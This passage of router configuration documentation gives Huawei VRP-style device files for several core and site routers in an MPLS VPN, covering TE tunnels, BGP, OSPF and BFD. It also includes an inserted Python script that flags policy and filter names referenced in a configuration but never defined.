mpls te affinity property 1 mask 1
mpls te affinity property 2 mask 2 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel612
description Core_SPE2 to Site1_UPE1
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.51
mpls te tunnel-id 72
mpls te record-route
mpls te affinity property 4 mask 4
mpls te affinity property 8 mask 8 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel621
description Core_SPE2 to Site1_UPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.50
mpls te tunnel-id 81
mpls te record-route
mpls te affinity property 8 mask 8
mpls te affinity property 4 mask 4 secondary
mpls te backup hot-standby
mpls te commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.4 as-number 65000
peer 172.16.0.4 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.50 as-number 65000
peer 172.16.2.50 group devHost
peer 172.16.2.51 as-number 65000
peer 172.16.2.51 group devHost
peer 172.16.2.75 as-number 65000
peer 172.16.2.75 group devHost
peer 172.16.2.76 as-number 65000
peer 172.16.2.76 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.50 enable
undo peer 172.16.2.51 enable
undo peer 172.16.2.75 enable
undo peer 172.16.2.76 enable
#
ipv4-family vpnv4
policy vpn-target
auto-frr
nexthop recursive-lookup delay 10
tunnel-selector TSel
bestroute nexthop-resolved tunnel
route-select delay 120
peer devCore enable
peer devCore route-policy core-import import
peer devCore advertise-community
peer 172.16.0.4 enable
peer 172.16.0.4 group devCore
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer devHost enable
peer devHost route-policy p_iBGP_RR_in import
peer devHost advertise-community
peer devHost upe
peer devHost default-originate vpn-instance vpna
peer 172.16.2.50 enable
peer 172.16.2.50 group devHost
peer 172.16.2.51 enable
peer 172.16.2.51 group devHost
peer 172.16.2.75 enable
peer 172.16.2.75 group devHost
peer 172.16.2.76 enable
peer 172.16.2.76 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
auto-frr
nexthop recursive-lookup route-policy delay_policy
nexthop recursive-lookup delay 10
vpn-route cross multipath
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface Eth-Trunk2
undo silent-interface Eth-Trunk4
undo silent-interface Eth-Trunk17
undo silent-interface XGigabitEthernet5/0/5
spf-schedule-interval millisecond 10
lsa-originate-interval 0
lsa-arrival-interval 0
opaque-capability enable
graceful-restart period 600
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#8|'*QyJCZ<@"H2,\pm@FUK3R3uSfFGaaJr39=1%^%#
network 172.16.0.3 0.0.0.0
network 172.16.8.178 0.0.0.0
network 172.17.4.0 0.0.0.0
network 172.17.4.9 0.0.0.0
network 172.17.4.12 0.0.0.0
mpls-te enable
#
route-policy delay_policy permit node 0
if-match community-filter all_site
#
route-policy p_iBGP_RR_in deny node 5
if-match ip-prefix deny_host
if-match community-filter all_site
#
route-policy p_iBGP_RR_in permit node 11
if-match community-filter site1
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 12
if-match community-filter site2
apply preferred-value 300
#
route-policy p_iBGP_RR_in permit node 13
if-match community-filter site3
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 20
#
route-policy core-import deny node 5
if-match community-filter site12
#
route-policy core-import deny node 6
if-match community-filter site23
#
route-policy core-import permit node 10
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal 32
ip ip-prefix core_nhp index 10 permit 172.16.0.4 32
ip ip-prefix core_nhp index 20 permit 172.16.0.5 32
#
ip community-filter basic site1 permit 100:100
ip community-filter basic site2 permit 200:200
ip community-filter basic site3 permit 300:300
ip community-filter basic site12 permit 12:12
ip community-filter basic site23 permit 23:23
ip community-filter basic all_site permit 5720:5720
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
tunnel-policy TE
tunnel select-seq cr-lsp load-balance-number 1
#
bfd SPE2toSPE1 bind ldp-lsp peer-ip 172.16.0.5 nexthop 172.17.4.8 interface Eth-Trunk4
discriminator local 137
discriminator remote 317
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toSPE3 bind ldp-lsp peer-ip 172.16.0.4 nexthop 172.17.4.1 interface Eth-Trunk2
discriminator local 127
discriminator remote 217
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE1_b bind mpls-te interface Tunnel612 te-lsp backup
discriminator local 6126
discriminator remote 6125
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE1_m bind mpls-te interface Tunnel612 te-lsp
discriminator local 6122
discriminator remote 6121
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE2_b bind mpls-te interface Tunnel621 te-lsp backup
discriminator local 6216
discriminator remote 6215
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE2_m bind mpls-te interface Tunnel621 te-lsp
discriminator local 6212
discriminator remote 6211
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE3_b bind mpls-te interface Tunnel111 te-lsp backup
discriminator local 1116
discriminator remote 1115
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE3_m bind mpls-te interface Tunnel111 te-lsp
discriminator local 1112
discriminator remote 1111
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE4_b bind mpls-te interface Tunnel121 te-lsp backup
discriminator local 1216
discriminator remote 1215
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE2toUPE4_m bind mpls-te interface Tunnel121 te-lsp
discriminator local 1212
discriminator remote 1211
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.5.7.3 Core_SPE3 Configuration File

sysname Core_SPE3
#
router id 172.16.0.4
#
stp disable
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 4:1
tnl-policy TSel
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
tunnel-selector TSel permit node 9
if-match ip next-hop ip-prefix core_nhp
#
tunnel-selector TSel permit node 10
apply tunnel-policy TE
#
bfd
#
mpls lsr-id 172.16.0.4
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
load-balance-profile CUSTOM
ipv6 field l4-sport l4-dport
ipv4 field l4-sport l4-dport
#
interface Eth-Trunk2
undo portswitch
description Core_SPE3 to Core_SPE2
ip address 172.17.4.1 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 3
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface Eth-Trunk5
undo portswitch
description Core_SPE3 to Core_SPE1
ip address 172.17.4.3 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 30
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
load-balance enhanced profile CUSTOM
#
interface XGigabitEthernet1/0/0
eth-trunk 5
#
interface XGigabitEthernet1/0/1
eth-trunk 5
#
interface XGigabitEthernet1/0/2
eth-trunk 5
#
interface XGigabitEthernet1/0/3
eth-trunk 5
#
interface XGigabitEthernet2/0/4
eth-trunk 2
#
interface XGigabitEthernet2/0/5
eth-trunk 2
#
interface XGigabitEthernet2/0/6
eth-trunk 2
#
interface XGigabitEthernet2/0/7
eth-trunk 2
#
interface XGigabitEthernet6/0/1
undo portswitch
description Core_SPE3 to Site3_UPE5
ip address 172.16.8.213 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 10
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface XGigabitEthernet6/0/3
undo portswitch
description Core_SPE3 to Site2_UPE4
ip address 172.16.8.183 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 2
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.0.4 255.255.255.255
#
interface Tunnel112
description Core_SPE3 to Site2_UPE3
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.75
mpls te tunnel-id 112
mpls te bfd enable
mpls te record-route
mpls te affinity property 2 mask 2
mpls te affinity property 1 mask 1 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel122
description Core_SPE3 to Site2_UPE4
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.76
mpls te tunnel-id 122
mpls te record-route
mpls te affinity property 2 mask 2
mpls te affinity property 1 mask 1 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel712
description Core_SPE3 to Site3_UPE6
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.86
mpls te tunnel-id 321
mpls te record-route
mpls te affinity property 10 mask 10
mpls te affinity property 20 mask 20 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel722
description Core_SPE3 to Site3_UPE5
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.2.87
mpls te tunnel-id 322
mpls te record-route
mpls te affinity property 10 mask 10
mpls te affinity property 20 mask 20 secondary
mpls te backup hot-standby
mpls te commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.75 as-number 65000
peer 172.16.2.75 group devHost
peer 172.16.2.76 as-number 65000
peer 172.16.2.76 group devHost
peer 172.16.2.86 as-number 65000
peer 172.16.2.86 group devHost
peer 172.16.2.87 as-number 65000
peer 172.16.2.87 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.5 enable
undo peer 172.16.2.75 enable
undo peer 172.16.2.76 enable
undo peer 172.16.2.86 enable
undo peer 172.16.2.87 enable
#
ipv4-family vpnv4
policy vpn-target
auto-frr
nexthop recursive-lookup delay 10
tunnel-selector TSel
bestroute nexthop-resolved tunnel
route-select delay 120
peer devCore enable
peer devCore route-policy core-import import
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer devHost enable
peer devHost route-policy p_iBGP_RR_in import
peer devHost advertise-community
peer devHost upe
peer devHost default-originate vpn-instance vpna
peer 172.16.2.75 enable
peer 172.16.2.75 group devHost
peer 172.16.2.76 enable
peer 172.16.2.76 group devHost
peer 172.16.2.86 enable
peer 172.16.2.86 group devHost
peer 172.16.2.87 enable
peer 172.16.2.87 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
auto-frr
nexthop recursive-lookup route-policy delay_policy
nexthop recursive-lookup delay 10
vpn-route cross multipath
route-select delay 120
#
ospf 1
silent-interface all
undo silent-interface Eth-Trunk5
undo silent-interface Eth-Trunk2
undo silent-interface XGigabitEthernet6/0/1
undo silent-interface XGigabitEthernet6/0/3
spf-schedule-interval millisecond 10
lsa-originate-interval 0
lsa-arrival-interval 0
opaque-capability enable
graceful-restart period 600
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#N@WU@i600:_5W!%F!L~9%7ui(!x:VP5<mJ:z>zJX%^%#
network 172.16.0.4 0.0.0.0
network 172.16.8.183 0.0.0.0
network 172.16.8.213 0.0.0.0
network 172.17.4.1 0.0.0.0
network 172.17.4.3 0.0.0.0
mpls-te enable
#
route-policy delay_policy permit node 0
#
route-policy p_iBGP_RR_in deny node 5
if-match ip-prefix deny_host
if-match community-filter all_site
#
route-policy p_iBGP_RR_in permit node 11
if-match community-filter site1
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 12
if-match community-filter site2
apply preferred-value 200
#
route-policy p_iBGP_RR_in permit node 13
if-match community-filter site3
apply preferred-value 300
#
route-policy p_iBGP_RR_in permit node 20
#
route-policy core-import deny node 5
if-match community-filter site13
#
route-policy core-import deny node 6
if-match community-filter site23
#
route-policy core-import permit node 10
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal 32
ip ip-prefix core_nhp index 10 permit 172.16.0.3 32
ip ip-prefix core_nhp index 20 permit 172.16.0.5 32
#
ip community-filter basic site1 permit 100:100
ip community-filter basic site2 permit 200:200
ip community-filter basic site3 permit 300:300
ip community-filter basic all_site permit 5720:5720
ip community-filter basic site13 permit 13:13
ip community-filter basic site23 permit 23:23
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
tunnel-policy TE
tunnel select-seq cr-lsp load-balance-number 1
#
bfd SPE3toSPE1 bind ldp-lsp peer-ip 172.16.0.5 nexthop 172.17.4.2 interface Eth-Trunk5
discriminator local 23
discriminator remote 32
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toSPE2 bind ldp-lsp peer-ip 172.16.0.3 nexthop 172.17.4.0 interface Eth-Trunk2
discriminator local 217
discriminator remote 127
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE3_b bind mpls-te interface Tunnel112 te-lsp backup
discriminator local 1126
discriminator remote 1125
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE3_m bind mpls-te interface Tunnel112 te-lsp
discriminator local 1122
discriminator remote 1121
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE4_b bind mpls-te interface Tunnel122 te-lsp backup
discriminator local 1226
discriminator remote 1225
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE4_m bind mpls-te interface Tunnel122 te-lsp
discriminator local 1222
discriminator remote 1221
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE5_b bind mpls-te interface Tunnel722 te-lsp backup
discriminator local 7226
discriminator remote 7225
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE5_m bind mpls-te interface Tunnel722 te-lsp
discriminator local 7222
discriminator remote 7221
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE6_b bind mpls-te interface Tunnel712 te-lsp backup
discriminator local 7126
discriminator remote 7125
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd SPE3toUPE6_m bind mpls-te interface Tunnel712 te-lsp
discriminator local 7122
discriminator remote 7121
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return
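
The Core_SPE3 listing above, like the other device files in this section, wires BGP peers, VPN instances and if-match clauses to route-policies, IP prefix lists, community filters and tunnel policies that are defined elsewhere in the same file. A name that is referenced but never defined matches nothing, so the policy silently does something other than intended (a deny node that never fires, an import policy that filters nothing). The following script is an added example, not part of the Huawei document or its products: it walks a VRP-style config dump and lists such dangling references. The sample configuration is constructed and modelled on the listing above, with one deliberate defect inserted (core-import matches community-filter site12 while only site13 is defined); the regular expressions cover only the reference forms that appear in this section.

```python
"""Dangling-reference check for Huawei VRP-style configuration dumps.

Added example. Assumes the layout seen in this section: policy objects are
defined at top level and referenced from BGP peers, VPN instances and
if-match clauses. Anything referenced but never defined is reported.
"""
import re

KINDS = ("community-filter", "ip-prefix", "route-policy", "tunnel-policy")

# Definition lines: the object name is the first token after the keyword.
DEFINITION_PATTERNS = {
    "community-filter": re.compile(r"ip community-filter (?:basic|advanced) (\S+)"),
    "ip-prefix": re.compile(r"ip ip-prefix (\S+) "),
    "route-policy": re.compile(r"route-policy (\S+) (?:permit|deny) node"),
    "tunnel-policy": re.compile(r"tunnel-policy (\S+)$"),
}

# Reference lines: match clauses, peer/VPN/nexthop policies, tunnel policies.
REFERENCE_PATTERNS = {
    "community-filter": re.compile(r"if-match community-filter (\S+)"),
    "ip-prefix": re.compile(r"if-match (?:ip-prefix|ip next-hop ip-prefix) (\S+)"),
    "route-policy": re.compile(r"\broute-policy (\S+)"),
    "tunnel-policy": re.compile(r"(?:tnl-policy|apply tunnel-policy) (\S+)"),
}


def collect(config_text):
    """Return (defined, referenced): two dicts mapping kind -> set of names."""
    defined = {k: set() for k in KINDS}
    referenced = {k: set() for k in KINDS}
    for raw in config_text.splitlines():
        line = raw.strip()
        # A definition line is consumed here and never counted as a reference.
        for kind, pat in DEFINITION_PATTERNS.items():
            m = pat.match(line)
            if m:
                defined[kind].add(m.group(1))
                break
        else:
            for kind, pat in REFERENCE_PATTERNS.items():
                m = pat.search(line)  # references sit mid-line ("peer X route-policy Y import")
                if m:
                    referenced[kind].add(m.group(1))
    return defined, referenced


def dangling_references(config_text):
    """Return kind -> sorted names that are referenced but never defined."""
    defined, referenced = collect(config_text)
    return {k: sorted(referenced[k] - defined[k]) for k in KINDS}


# Constructed sample modelled on the Core_SPE3 listing, with one deliberate
# defect: core-import matches community-filter site12, but only site13 exists.
SAMPLE_CONFIG = """\
sysname Core_SPE3
#
ip vpn-instance vpna
 ipv4-family
  tnl-policy TSel
#
tunnel-selector TSel permit node 10
 apply tunnel-policy TE
#
bgp 65000
 ipv4-family vpnv4
  peer devCore route-policy core-import import
  peer devHost route-policy p_iBGP_RR_in import
 ipv4-family vpn-instance vpna
  nexthop recursive-lookup route-policy delay_policy
#
route-policy delay_policy permit node 0
#
route-policy p_iBGP_RR_in deny node 5
 if-match ip-prefix deny_host
 if-match community-filter all_site
#
route-policy core-import deny node 5
 if-match community-filter site12
#
route-policy core-import permit node 10
#
ip ip-prefix deny_host index 10 permit 0.0.0.0 0 greater-equal 32 less-equal 32
#
ip community-filter basic all_site permit 5720:5720
ip community-filter basic site13 permit 13:13
#
tunnel-policy TSel
 tunnel select-seq cr-lsp lsp load-balance-number 1
#
tunnel-policy TE
 tunnel select-seq cr-lsp load-balance-number 1
#
return
"""

if __name__ == "__main__":
    for kind, names in dangling_references(SAMPLE_CONFIG).items():
        print(f"{kind}: {names or 'ok'}")
```

Run it against each device file separately, since every device in this section defines its own copies of the policy objects; the one defect in the constructed sample is reported under community-filter and the other three kinds come back clean.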

2.5.7.4 Site1_UPE1 Configuration File

sysname Site1_UPE1
#
router id 172.16.2.51
#
arp vlink-direct-route advertise
#
stp disable
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
ip frr route-policy mixfrr
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
bfd
#
mpls lsr-id 172.16.2.51
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
interface Eth-Trunk7
undo portswitch
description Site1_UPE1 TO Site1_UPE2
ip address 172.17.4.14 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group c
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
#
interface Eth-Trunk17
undo portswitch
description Site1_UPE1 to Core_SPE1
ip address 172.17.4.11 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 4
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
#
interface XGigabitEthernet1/0/0
eth-trunk 17
#
interface XGigabitEthernet1/0/1
eth-trunk 17
#
interface XGigabitEthernet1/0/2
eth-trunk 17
#
interface XGigabitEthernet1/0/3
eth-trunk 17
#
interface XGigabitEthernet1/0/4
port link-type trunk
undo port trunk allow-pass vlan 1
#
interface XGigabitEthernet1/0/4.200
dot1q termination vid 200
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.200.66 255.255.255.192
vrrp vrid 1 virtual-ip 172.18.200.65
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 2200 peer
vrrp vrid 1 backup-forward
arp broadcast enable
vrrp track bfd gratuitous-arp send enable
#
interface XGigabitEthernet4/0/4
eth-trunk 7
#
interface XGigabitEthernet4/0/5
eth-trunk 7
#
interface XGigabitEthernet4/0/6
eth-trunk 7
#
interface XGigabitEthernet4/0/7
eth-trunk 7
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.2.51 255.255.255.255
#
interface Tunnel611
description Site1_UPE1 to Core_SPE1
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.5
mpls te tunnel-id 71
mpls te record-route
mpls te affinity property 4 mask 4
mpls te affinity property 8 mask 8 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel612
description Site1_UPE1 to Core_SPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.3
mpls te tunnel-id 72
mpls te record-route
mpls te affinity property 4 mask 4
mpls te affinity property 8 mask 8 secondary
mpls te backup hot-standby
mpls te commit
#
bfd vrrp-1 bind peer-ip 172.18.200.67 vpn-instance vpna interface XGigabitEthernet1/0/4.200 source-ip 172.18.200.66
discriminator local 2200
discriminator remote 1200
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.50 as-number 65000
peer 172.16.2.50 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.50 enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.5 enable
#
ipv4-family vpnv4
policy vpn-target
route-select delay 120
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.3 preferred-value 200
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer 172.16.0.5 preferred-value 300
peer devHost enable
peer devHost advertise-community
peer 172.16.2.50 enable
peer 172.16.2.50 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex
auto-frr
route-select delay 120
#
#
ospf 1
silent-interface all
undo silent-interface Eth-Trunk7
undo silent-interface Eth-Trunk17
opaque-capability enable
graceful-restart period 600
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#nU!dUe#c'J!;/%*WtZxQ<gP:'zx_E2OQnML]q;s#%^%#
network 172.16.2.51 0.0.0.0
network 172.17.4.11 0.0.0.0
network 172.17.4.14 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
apply backup-nexthop 172.16.2.50
#
route-policy p_iBGP_host_ex permit node 0
apply community 100:100 5720:5720 12:12
#
route-policy p_iBGP_RR_ex permit node 0
apply community 100:100 5720:5720 12:12
#
arp expire-time 62640
arp static 172.18.200.68 0001-0002-0003 vid 200 interface XGigabitEthernet1/0/4.200
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
bfd UPE1toSPE1_m_b bind mpls-te interface Tunnel611 te-lsp backup
discriminator local 6115
discriminator remote 6116
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE1_m bind mpls-te interface Tunnel611 te-lsp
discriminator local 6111
discriminator remote 6112
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_b bind mpls-te interface Tunnel612 te-lsp backup
discriminator local 6125
discriminator remote 6126
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
bfd UPE1toSPE2_m bind mpls-te interface Tunnel612 te-lsp
discriminator local 6121
discriminator remote 6122
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
return

2.5.7.5 Site1_UPE2 Configuration File

sysname Site1_UPE2
#
router id 172.16.2.50
#
arp vlink-direct-route advertise
#
stp disable
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 1:1
ip frr route-policy mixfrr
tnl-policy TSel
arp vlink-direct-route advertise
vpn-target 0:1 export-extcommunity
vpn-target 0:1 import-extcommunity
#
bfd
#
mpls lsr-id 172.16.2.50
mpls
mpls te
label advertise non-null
mpls rsvp-te
mpls rsvp-te hello
mpls rsvp-te hello full-gr
mpls te cspf
#
mpls ldp
graceful-restart
#
#
interface Eth-Trunk7
undo portswitch
description Site1_UPE2 to Site1_UPE1
ip address 172.17.4.15 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group c
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
#
interface Eth-Trunk17
undo portswitch
description Site1_UPE2 to Core_SPE2
ip address 172.17.4.13 255.255.255.254
ospf network-type p2p
ospf ldp-sync
ospf timer ldp-sync hold-down 20
mpls
mpls te
mpls te link administrative group 8
mpls rsvp-te
mpls rsvp-te hello
mpls ldp
least active-linknumber 4
#
interface XGigabitEthernet1/0/4
port link-type trunk
#
interface XGigabitEthernet1/0/4.200
dot1q termination vid 200
ip binding vpn-instance vpna
arp direct-route enable
ip address 172.18.200.67 255.255.255.192
vrrp vrid 1 virtual-ip 172.18.200.65
vrrp vrid 1 priority 90
vrrp vrid 1 preempt-mode timer delay 250
vrrp vrid 1 track bfd-session 1200 peer
vrrp vrid 1 backup-forward
arp broadcast enable
vrrp track bfd gratuitous-arp send enable
#
interface XGigabitEthernet6/0/0
eth-trunk 17
#
interface XGigabitEthernet6/0/1
eth-trunk 17
#
interface XGigabitEthernet6/0/2
eth-trunk 17
#
interface XGigabitEthernet6/0/3
eth-trunk 17
#
interface XGigabitEthernet6/0/4
eth-trunk 7
#
interface XGigabitEthernet6/0/5
eth-trunk 7
#
interface XGigabitEthernet6/0/6
eth-trunk 7
#
interface XGigabitEthernet6/0/7
eth-trunk 7
#
interface LoopBack1
description ** GRT Management Loopback **
ip address 172.16.2.50 255.255.255.255
#
interface Tunnel621
description Site1_UPE2 to Core_SPE2
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.3
mpls te tunnel-id 81
mpls te record-route
mpls te affinity property 8 mask 8
mpls te affinity property 4 mask 4 secondary
mpls te backup hot-standby
mpls te commit
#
interface Tunnel622
description Site1_UPE2 to Core_SPE1
ip address unnumbered interface LoopBack1
tunnel-protocol mpls te
destination 172.16.0.5
mpls te tunnel-id 82
mpls te record-route
mpls te affinity property 8 mask 8
mpls te affinity property 4 mask 4 secondary
mpls te backup hot-standby
mpls te commit
#
bfd vrrp-1 bind peer-ip 172.18.200.66 vpn-instance vpna interface XGigabitEthernet1/0/4.200 source-ip 172.18.200.67
discriminator local 1200
discriminator remote 2200
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
commit
#
bgp 65000
graceful-restart
group devCore internal
peer devCore connect-interface LoopBack1
peer 172.16.0.3 as-number 65000
peer 172.16.0.3 group devCore
peer 172.16.0.5 as-number 65000
peer 172.16.0.5 group devCore
group devHost internal
peer devHost connect-interface LoopBack1
peer 172.16.2.51 as-number 65000
peer 172.16.2.51 group devHost
#
ipv4-family unicast
undo synchronization
undo peer devCore enable
undo peer devHost enable
undo peer 172.16.2.51 enable
undo peer 172.16.0.3 enable
undo peer 172.16.0.5 enable
#
ipv4-family vpnv4
policy vpn-target
route-select delay 120
peer devCore enable
peer devCore route-policy p_iBGP_host_ex export
peer devCore advertise-community
peer 172.16.0.3 enable
peer 172.16.0.3 group devCore
peer 172.16.0.3 preferred-value 300
peer 172.16.0.5 enable
peer 172.16.0.5 group devCore
peer 172.16.0.5 preferred-value 200
peer devHost enable
peer devHost advertise-community
peer 172.16.2.51 enable
peer 172.16.2.51 group devHost
#
ipv4-family vpn-instance vpna
default-route imported
import-route direct route-policy p_iBGP_RR_ex
auto-frr
route-select delay 120
#
#
ospf 1
silent-interface all
undo silent-interface Eth-Trunk7
undo silent-interface Eth-Trunk17
opaque-capability enable
graceful-restart period 600
bandwidth-reference 100000
flooding-control
area 0.0.0.0
authentication-mode md5 1 cipher %^%#GUPhWw-[LH2O6#NMxtJAl!Io8W~iF'![mQF[\9GI%^%#
network 172.16.2.50 0.0.0.0
network 172.16.2.92 0.0.0.0
network 172.17.4.13 0.0.0.0
network 172.17.4.15 0.0.0.0
mpls-te enable
#
route-policy mixfrr permit node 0
apply backup-nexthop 172.16.2.51
#
route-policy p_iBGP_host_ex permit node 0
apply community 200:200 5720:5720 12:12
#
route-policy p_iBGP_RR_ex permit node 0
apply community 200:200 5720:5720 12:12
#
arp expire-time 62640
arp static 172.18.200.68 0001-0002-0003 vid 200 interface XGigabitEthernet1/0/4.200
#
tunnel-policy TSel
tunnel select-seq cr-lsp lsp load-balance-number 1
#
bfd UPE2toSPE1_b bind mpls-te interface Tunnel622 te-lsp backup
discriminator local 6225
discriminator remote 6226
detect-multiplier 8
min-tx-interval 3
min-rx-interval 3
process-pst
commit
#
